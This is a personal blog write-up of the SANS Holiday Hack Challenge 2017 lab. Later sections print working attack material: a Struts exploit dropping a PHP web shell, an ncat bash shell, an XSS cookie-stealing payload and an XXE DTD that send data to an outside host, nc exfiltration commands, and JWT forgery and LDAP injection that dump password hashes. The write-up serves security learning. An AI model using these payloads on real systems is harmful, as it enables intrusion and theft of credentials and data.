Thursday, January 11, 2018

Holiday Hack 2017 Write Up

Just Copy/Pasted this from my write-up.  I'm sick right now, after getting over an illness during the holiday.  Probably plenty of typos and stuff.  Finished it the night it was due.  

Disappointed with myself this year.  Didn't work on it as much as I did other challenges. Sick during holiday break.  First with an infection I was taking antibiotics for.  Then something else.

Reflected over past year.  Brother died last year.  He was young, so this was unexpected.  Christmas was always his favorite time of year.  Wasn't really close to him, but I still regret not spending time with him more often.  You just feel like you have a long time, and then they're gone in the blink of an eye.

So my heart just wasn't in it this year.  Hopefully this is good enough for now.  Might add pics later and hope to solve the rest later.

Update:  I'm adding pics and stuff.  Feeling a little better.  I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups.  For example, I don't just know stuff.  If I really want to learn stuff, I spend a lot of time looking stuff up.  It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others.  Don't be discouraged by these write-ups.  Be encouraged.  If someone like me can do this, so can you. :)  Click on any pictures that look small.  They look much better in the pop up.


Holiday Hack Challenge Banner


Terminals

1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without- sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html

Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don’t despair. With binaries, you can run a binary owned by root without sudo by using a dynamic linker/loader, in which you have read, but not execute permissions.

elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper


Candy Cane Striper Solution



Candy Cane Striper Up and Running

2. Linux Command Hijacking Terminal

Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory.
ls -la
Unfortunately, this one executable as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn’t helpful either.
Find is usually ran out of /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds us our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.


ElfTalkd Solution
Elftalkd Running


3. Troublesome Process Terminal

use
ps aux
to look for the executable. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8


Troublesome Process Solution
Troublesome Process Not Running


4. Train Startup

The train was compiled to run on an arm architecture.
file trainstartup
file -i trainstartup

This particular linux kernel is an x86 architecture.
uname -a
qemu-arm is an emulator used to run arm executables on an x86-64 architecture. So, simply typing:
qemu-arm ./trainstartup
runs the program.
Train Startup Solution
Train Running

5. IsIt42 Terminal
This one seems similar to library path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for- the-win
Note: This only works on c libraries. It does not work on user-defined functions.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a c library.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.

You may use vim or whatever editor you like. Nano is just one of them.

nano isit42test.c

Type the following:

int rand(void){ 
printf(“Highjacking rand() to return 42.\n”);
return 42; 
}

Save the file.

Next, the shared library should be compiled. Make sure to add the -shared and -fPIC at the end, or it won’t make a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
Now, the library that is desired to be loaded must be found before the actual c library that the program is referencing is found. The isit42 program is also ran during this step.
LD_PRELOAD=“$PWD/isit42test” ./isit42
It should return 42.
Cat Sample Program


Highjacking Rand()

Compile New Library - LD Preload
This next part goes by pretty quickly.  When you execute the program, with the library preloaded, you'll briefly see it state that it's "Returning 42!" or whatever you put in that printf statement in the library you made.  That means you successfully highjacked the library.  You should see it return 42.  As long as you preload your library, it will always return 42.


Hijacked Rand() Library

6. Christmas Songs Data Analysis Terminal


Christmas Songs Terminal

There is a command line program that is often on Linux called sqlite3. It is used for analyzing databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes



Christmas Songs DB

There are two tables in the database. In order to get the most liked song, we have to tell sqlite3 that we want to get information from both tables that is related to each other. In relational databases, we can get information from both tables that is related to each other by the use of primary keys and foreign keys. In this case, the songs.id is the primary key for the songs table. The songs.id is also a foreign key for the likes table. In the likes table, songs.id is known as songid.
So, part of our query will be “where songs.id=likes.songid”.
We use the . notation above to tell sqlite that we want the id column from the songs table, and the songid column from the likes tables.
Often, as a database grows, an entry may be put into the database more than one time. In this case, the song title may have been added more than once. The following puts all of the repeat titles into one line.
So, part of our query will be “group by songs.title”
As a result of the song title being added more than once, we will have to add the number of likes for that specific title together. We do this by using the “sum” function in sql.
So, part of our query will be sum(likes.like)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:

select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;


Christmas Songs DB Query
Looks like the Answer is Stairway to Heaven.  We'll run the program "runtoanswer" to be sure.
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer


Christmas DB Number 1 Song

7. Web Log Terminal Challenge
Web Log Terminal
The goal of this challenge was to analyze an apache access log to find the least common browser. Fortunately, it is plain text, and has well defined delimiters, so if one has a decent understanding of some Linux command line tools, it shouldn’t be tough. If not, Google is your friend. There are many ways to solve this one, only a google search away. Here is one way:
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.

awk -F\” ‘{print $6}; | - the delimiter in this log is a “ character. Separate each line into pieces indicated by this delimiter. I only want the 6th piece. The 6th piece is the user agent string. Send the 6th piece output to the next command.
sort -n | - sort the 6th piece by number of occurrences. Send that output to the next command.
uniq -c - I only want to see unique occurrences of the 6th piece. Send those to the next command.
sort -n | Sort the unique instances of the 6th piece by number of occurrences. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.


After running cat access.log ...


Web Terminal Challenge Answer
8. Shadow Restoration Challenge
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for 
man sudo - found a switch to run as a group. (I did this on another linux box.  The game terminal wouldn't let me do it.)

The goal of this one is to restore the shadow file from a backup.
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l


Shadow Terminal

This user has the ability to run the find command.  You can see that near the bottom where it says, "User elf may run the following commands..."  It also says that the user can run it without a password.  it says, "NOPASSWD".  And that elf is a member of the shadow group. "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any users is not known, so use the -g switch to use a group. The group in Linux responsible for password managment - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying, /etc/shadow.bak. One could actually use /etc/ shadow.bak in place of the {} and it will work just fine. Just simpler to use that {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box


Shadow File Successfully Restored

Holiday Hack Challenge Questions
  1. 1)  Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

    The title of that page is About This Book. 

  2. 2)  Investigate the Letters to Santa application at https:// l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password? 



  3. Alabaster Snowball Password

    The topic of this page is flying animals. Alabaster Snowball’s password is stream_unhappy_buy_loss. 

  4. 3)  The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa
    server, identify and enumerate the SMB file-sharing server. What is the file server share name?
FileStor. For the record, I could log onto IPC$ as well. Just couldn’t get a directory listing. Seemed to let me change to another directory, though. Also, it gives a different error message when I try to write to the directory using “put” so it might be writable. FileStor gives NT_STATUS_ACCESS_DENIED opening remote file \test when I try to put test to it. IPC$ gives NT_STATUS_OBJECT_NAME_NOT_FOUND error when I try to put a test file to it.
SSH Port Forwarding to SMB Server
SMB Protocol Via Browser
Finder Asking Permission To Access Share
Entering Alabaster's Creds to Access Share
Selecting Share
Contents of FileStor

4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?


SSH Port Forwarding to Mail Server
Setting Up Browser Proxy - Firefox

E-Mail Showing Where Page 4 Was On the Mail Server.

Mail Server - Page 4 - Rise of the Lollipop Guild

Elves and Munchkins don’t like each other. They have a long-standing feud. It’s never been proven, but the Elves believe that the Munchkins have sent Munchkin Moles to the North Pole.

5) How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain, and what is your proof?

a) 8 infractions are required to be marked as naughty on Santa’s Naughty and Nice List. (The lowest amount of infractions I could find for a naughty person was 8).

b) The insider moles are: Bog Questrian, Bini Aru - these two are known because they were mentioned in the BOLO:Munchkin Mole Advisory. 

Known Munchkin Moles
To find the other names of elves, I assume one can compare the traits mentioned in the hints in the Stocking like fighting, pulling hair, throwing rocks at people, and giving atomic wedgies to the individuals listed in the Infractions directory. One could also see the highest offenders in the list - i.e. the ones with the most total coal. It’s profiling, but it may give a good indication of who is likely to be a mole. Another thought that I had logging into each suspicious individual’s e-mail account if possible and seeing if there were any e-mails that contained damning evidence.

c) The Abominable Snow Monster, AKA Bumble, is throwing the giant snowballs - a page of the great book states that he’s throwing the snowballs - however, he’s under the influence of something magical that he ate.  (If one plays thorough the game, it's revealed that he is throwing snowballs as well.


Great Book Page 5

Game Reveal

6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?


SSH Port Forwarding to EAAS
I posted the picture of setting up a proxy in the browser earlier.  By now, it should be clear.  The SSH Port Forwarding requires different ports.  FYI, you can set up the port forwarding all at once, I just don't like to have a lot of stuff listening.  So, you could go:

ssh -L 9000:10.142.0.5:80 alabaster_snowball@l2s.northpolechristmastown.com
ssh -L 9001:10.142.0.13:80 alabaster_snowball@l2s.northpolechristmastown.com
etc.  Then you'd just set up different proxies for each of them.  It's all about personal preference.

Great Book Page 6 Dreaded Inter-Dimensional Tornadoes
The title of The Great book page is: The Dreaded Inter-Dimensional Tornadoes.

7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?

I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words “gingerbread”, ”cookie,” and “recipe”. Shinny Upatree also gives the hint in the stocking talking about DDE.  He also said that he reprimanded for a security violation and that Alabaster installs unnecessary software  the EMI server all the time including Microsoft Office.  DDE Injection can be done with Word, Excel, Outlook, Powerpoint - probably more stuff- but those are the products I've seen it done in articles.


SSH Port Forwarding To Mail Server

Setting Up Proxy in Browser - Firefox

Alabaster Hinting he will click on anything regarding gingerbread cookies.
Tarpin McJinglehauser stating to be on the lookout for certain e-mails.
Minty hinting that they may be vulnerable to DDE Injection.
Alabaster pulling down the file using nc.
Alabaster stating that he has nc installed to his $PATH.
Alabaster stating that they have powershell.


Shinny Upatree Reprimanded

Shinny Upatree Unnecessary Software
Unfortunately, I couldn’t get any of my exploit attempts to work. I’ll detail my attempts later in this write-up.

8) Fetch the letter to Santa from the North Pole Elf Database at http:// edb.northpolechristmastown.com. Who wrote the letter?

I just got into the edb/ldap server on the night that this was due, so I didn't get this one.  I did get it afterwards though.  I'm holding off on reading write-ups until I solve them.  It was the Wizard of Oz. :)


I retrieved the np-auth token via XXS.  I knew that I needed the np-auth item because of the web page source code.  Click on the Support Link and find the XSS vulnerability.  You can use a marker to test, or simply try to pop an alert.


EDB Server
EDB Support Page
EDB Source
It kept saying "Alert, Hacker" when I tried certain XSS payloads.  I just played around with it a bit to find out what it was filtering on.  An easier way would have been to check to see if there was any script that contained "Alert, Hacker!".  It didn't take long to figure out what it was alerting on, though.  It was just the word script.  So, I'd have to try payloads that either obfuscated the word "script" or payloads that didn't contain the word script.


XSS Marker Script
It won't let you put the marker in the Username and E-Mail because they have to be a certain format.  So, put a valid username and e-mail in each text box and add the marker script to the message.  Check the web page source code.


Message Vulnerable to XSS
Looks like the Message part is vulnerable.  When you look at the source code, that is where this is located.

Try filter evasion payloads until one pops an alert.


Try Payloads Until One Pops an alert
XSS Alert Success!
Now, change the payload so it dials back to you.


<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>

I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine.  The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth.  I just named it cookie catcher.php because I originally thought I needed a cookie.  I only set it up this way because I wanted to be certain I didn't miss it.  This script saves the cookies to a log that I can look at later.

I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap. 


Alabaster's JWT Token


Blank Key
Decoding Alabaster's JWT Token With PyJWT

I cracked the secret using jwtcrack. It was ‘3lv3s’. 


Cracking JWT Secret With jwtcrack

I then used py-jwt to forge a new token with the decoded token and changing the “expires” date. 


Forging Alabaster Snowball's JWT Token

9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?

Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
Glenda did it.  Can't say I'm surprised.  I always suspected she was up to no good.
L2S Server

This server was running Apache Struts, and was vulnerable to the exploit detailed here:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with- publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.


Dev Version of L2S


The Dev Version shows that it's running Apache Struts.


Running Apache Struts
I used the tool mentioned in the SANS Pen Testing Blog Post mentioned earlier to upload a web shell:  CVE-2017-9805.py  I named it struts_exploit.py so I would remember what it was way in the future.

python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo 'PGh0bWw+Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9IkdFVCIgbmFtZT0iPD9waHAgZWNobyBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+CjwvZm9ybT4KPHByZT4KPD9waHAKICAgIGlmKCRfR0VUWydjbWQnXSkKICAgIHsKICAgICAgICBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKICAgIH0KPz4KPC9wcmU+CjwvYm9keT4KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4KPC9odG1sPg==' > /var/www/html/quackquackhere.php"

That base64 is a web shell.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>


Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.

https://l2s.northpolechristmastown.com/quackquackhere.php?ls


I found it easier to upload my public key into the authorized_keys file and log on via ssh before I found the password. Unfortunately, logging in via ssh left me in a restricted shell.

python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo '<my pub key here>' >> /home/alabaster.snowball/.ssh/authorized_keys"


Pub Key
I'm not afraid of people having my public key.  Now if I showed my private key, that would be another story.  I'm reverting to a snap shot on that VM though.  So the key won't be on there at any rate whether it's safe or not.

Then I could just ssh in, presenting my private key.  Learned this in NetWars. :)  Like so:

ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com

Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot- of-tee, to break out of rbash. I was unsuccessful. 

I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.

https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it

Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell. 

cat /home/alabaster.snowball/.bashrc


Restricting Users to RBash

So then I did “ls /usr/local/rbin” to see what programs I could use. 


What Can I Execute In RBash?
I’ve used ncat several times and remembered that I could execute commands with it. So I tried ncat -l 59000 --exec “/bin/bash” &. Then I connected to my listener by typing ncat 127.0.0.1 59000. 


Escaped From RBash
If you've ever dealt with ncat, sometimes it is hard to tell that there is a prompt there.  It looks like a blank space, but if you type a commands, like cd .. and ls, it will show the output.  I know I escaped because in rbash, you can't change directories.

From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits.  Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com

SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine.  I have the pics posted earlier - in the "Holiday Hack Questions" Section.

ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.

My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster
Snowball’s credentials. They were username: alabaster_snowball; password: stream_unhappy_buy_loss.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.

Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt. 


Cookie.txt

The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.

var aes256 = require(“aes256” 1.0.2)
var key = ‘santaisonabender’;
var encrypted = ‘AAAAAAAAAAAAAAAAAAAAAA’; var plaintext = ‘’;
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted); console.log(decrypted);
if (decrypted === plaintext){

console.log(‘equal’); 
}

I found out that the IV is completely dropped by this module. In the program, it’s aes256 encrypted and base64 encoded. So to decrypt, it would be base64 decoded and aes256 decrypted.  22 A’s are required because when 16 characters - the IV are base64 encoded, it’s drawn out to 22 characters.  I played with base64 encoding to see what happens to come by that bit of information that 16 characters are padded out to 22.

The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text. 


Changing the cookie.
Then I looked at the response and saw /account.html. Typed in 10.142.0.5/account.html and I was logged into alabaster.snowball’s account. I found that I could log into other accounts using the same method as well, but changing the user account to whatever user I wanted to be. In alabaster.snowball’s account, I found hints to get access to the EMI server. Namely, Alabaster saying that he would click on any link in any e-mail containing the words gingerbread, cookie, recipe. Minty Candycane sent Alabaster Snowball an e-mail asking about DDE Injection, as well as sending a proof of concept found here: http://mail.northpolechristmastown.com/attachments/ dde_exmaple_minty_candycane.png.


Minty Candycane DDE Example

I posted those pics earlier, in the section about the Holiday Hack Challenge Questions.
EAAS Server
The nmap scan found this server at 10.142.0.13. The hints for this challenge were provided by Sugar Plum Mary. Again, used ssh port forwarding to pivot to this machine, and changed the proxy in my browser to allow me to see this web page.

Logging onto the eaas server, there is an area to submit requests to build elves using xml. 


EAAS Web Site

Click on the Elf Checking Service to Exploit this web site.


Not always Upload Capability that is vulnerable, but when it is....

This particular site is vulnerable to and External XML Entities attack. The attack detailed here works: https://pen-testing.sans.org/blog/ 2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities. Below is the dtd file that I submitted to the eaas server:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://x.x.x.x:6666/sweets.dtd"> %extentity;
%inception;
%sendit;
]

<

Below is the dtd file that I put on my server that I use to test vulnerabilities with.


<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % dataismine SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM ‘http://
x.x.x.x:6667/?%dataismine;'>">

Upload DTD XXE Exploit that borrows a file...

I used the python module SimpleHTTPServer to serve sweets.dtd so I
didn’t have to serve a full website.  I made sure I was in a directory
I wasn’t afraid for people to see the files in considering that
SimpleHTTPServer serves the current directory by default.

python -m SimpleHTTPServer 6666

Then I had a netcat listener running to catch greatbook.txt nc -nvlp 6667 > greatbook.txt



Serving Sweets on my borrowing Server

Great Book Page!

EMI Server
I wasn’t successful obtaining this file. I tried phishing alabaster snow using the hints detailed above in the Mail Server Section. The hints for this one were given by Shinny Upatree. For whatever reason, I only got Alabaster Snowball to successfully connect to me once or twice, and the same payload would not work another time. I tried the proof of concept that Minty Candycane submitted. I tried turning it around and using the (New-Object System.Net.WebClient).UploadFile(). I tried running ping and capturing the traffic on my server to test connectivity. I tried using nc to send the file to myself as nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf. I tried nc x.x.x.x 6666 &lt; C:\\GreatBookPage7.pdf thinking I might need to escape the < sign. I tried to offload the file onto the smb share owned by the elves or one of the other servers owned by the elves since I have access to them. I tried to offload the file to the l2s Server since I could break out of rbash on it. Found out the ip for the l2s server by doing:
/bin/netstat -n. 
10.142.0.11 
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))


EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:

<IMG SRC=# onerror=window.open(“http://x.x.x.x/cookiecatcher.php? cookie="+document.cookie)>

It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
On my server, I had a php program that I found that logs the cookie, found here:
https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in- php-get-via-email.html
I served it using the development module in php

sudo php -s 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forging a new token.


Alabaster Snowball's JWT Token
Blank Key
Alabaster's decoded JWT Token


I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.


Alabaster's Cracked JWT Secret.

I used the secret to forge a token with py-jwt.


Forged Alabaster's JWT Token.

I changed the local storage to hold a token named np-auth, with the value of the newly forged key.


Changing Local Storage np-auth
EDB Server

I just got into the edb/ldap server the night that the challenge is due, so I didn't finish getting that flag.  Hints give away what it is vulnerable to.  Also, I knew what the other servers were vulnerable to, and nmap says this is running ldap, hence the reason I know its the ldap one.

If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results.  Looking at the dev folder, you see this:


Dev Listing
LDAP LDIF Template
Update:  Well, that didn't take long.  I'm holding off on reading write-ups until I solve these.  It paid off.  I returned all the records from reading this post on the SANS Pen Testing blog.

https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap

Getting past this was annoying until I figured out what to do.


EDB Find Elves Source Code
So basically what happens is the radio button on the web page has to be checked for variable "IsElf" to be true, else "IsElf" is false.  If "isElf" from the request form is not equal to true, then isElf is reindeer.  If "isElf" form the request form is equal to true, then isElf is elf.  These represent the ou in LDAP.  So I did this query and it returned Rudolph.  I'm wondering how it returned Rudolph.  Look about two sentences ago-ifElf is false then ou = reindeer.  That is how Rudolph was returned.  Duh to me.  Then I noticed the scrollbar at the bottom.


Returning Everyone's Records
So how did everyone else's records return?  I honestly have no idea how this worked.  I will have to study it more. But, I changed the attributes as described in the article like so:


Changing HTML to get Password Hashes
It returned everyone's password hashes as well. Nice!


Santa's Password Hash!
Either crack it or try Google because it's an MD5 Hash.


Santa's Cracked Password
Log out and attempt to log in as Santa Claus...


Entering Password for Santa Panel
Letter From The Wizard!

NPPD Server

We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions on the database which can then be used to determine how many infractions could be done to be placed on the naughty list. It could potentially be used to see who moles are as well. 

No comments:

Post a Comment